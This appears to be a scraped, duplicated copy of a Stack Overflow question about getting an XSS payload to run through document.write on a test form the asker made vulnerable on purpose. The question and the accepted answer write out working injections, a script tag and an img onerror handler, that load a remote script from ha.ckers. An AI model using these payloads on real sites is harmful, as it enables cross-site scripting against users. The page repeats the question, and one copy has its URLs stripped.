admin管理员组

文章数量:1024582

How do i load an external .js script using this syntax?:

<script>document.write('<script src=.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src=".js"><\/script>')>

How do i load an external .js script using this syntax?:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>

  • javascript
  • xss
Share Improve this question edited Jul 3, 2013 at 22:24 user2536979 asked Jul 3, 2013 at 22:15 user2536979user2536979 311 gold badge3 silver badges8 bronze badges 1
  • You have to escape the </script> tag: <\/script> - otherwise the piler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16
Add a ment  | 

1 Answer 1

Reset to default 1

What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

<script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>

How do i load an external .js script using this syntax?:

<script>document.write('<script src=.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src=".js"><\/script>')>

How do i load an external .js script using this syntax?:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>

  • javascript
  • xss
Share Improve this question edited Jul 3, 2013 at 22:24 user2536979 asked Jul 3, 2013 at 22:15 user2536979user2536979 311 gold badge3 silver badges8 bronze badges 1
  • You have to escape the </script> tag: <\/script> - otherwise the piler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16
Add a ment  | 

1 Answer 1

Reset to default 1

What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

<script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>

本文标签: xssload external javascript in the syntaxStack Overflow

版权声明:本文标题:xss - load external javascript in the syntax - Stack Overflow 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/questions/1745621869a2159622.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。